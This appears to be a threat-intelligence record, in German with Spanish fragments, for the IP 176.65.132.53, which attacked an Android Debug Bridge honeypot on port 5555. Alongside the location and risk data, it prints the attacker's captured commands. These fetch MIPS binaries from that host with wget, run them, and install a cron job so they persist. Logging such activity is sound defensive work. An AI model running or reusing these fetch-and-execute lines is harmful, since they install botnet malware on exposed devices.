TROYANOSYVIRUS
Aktive BedrohungNIEDRIG

176.65.132.53

Herkunftsland🇩🇪 Alemania
Erste Erkennung4.5.2026
Letzte Aktivitat5.5.2026
ISPPfcloud UG (haftungsbeschrankt)
🎯
27
Gesamtangriffe
🔌
1
Ports
📡
1
Angriffsarten
🦠
0
Malware

Geolokalisierung

Land
🇩🇪 Alemania
Stadt
Unbekannt
ASN
AS51396
ISP
Pfcloud UG (haftungsbeschrankt)

Angriffsarten

adb_honeypot

Angegriffene Ports

5555

Zugehorige Malware

Keine zugehorige Malware

Ausgefuhrte Befehle

$uname -m6x
$getprop ro.product.cpu.abi 2>/dev/null4x
$cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://176.65.132.53/mips; chmod 777 mips; ./mips; rm -rf mips; cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://176.65.132.53/mipsel; chmod 777 mipsel; ./mipsel; rm -rf mipsel4x
$cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://176.65.132.53:9111/mips -O .rs; chmod 777 .rs; nohup ./.rs >/dev/null 2>&1 & echo '*/5 * * * * cd /tmp && ./.rs >/dev/null 2>&1' > /tmp/cron; crontab /tmp/cron 2>/dev/null || cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://176.65.132.53:9111/mipsel -O .rs; chmod 777 .rs; nohup ./.rs >/dev/null 2>&1 & echo '*/5 * * * * cd /tmp && ./.rs >/dev/null 2>&1' > /tmp/cron; crontab /tmp/cron 2>/dev/null2x

Risikobewertung

15
/100
NiedrigMittelHochKritisch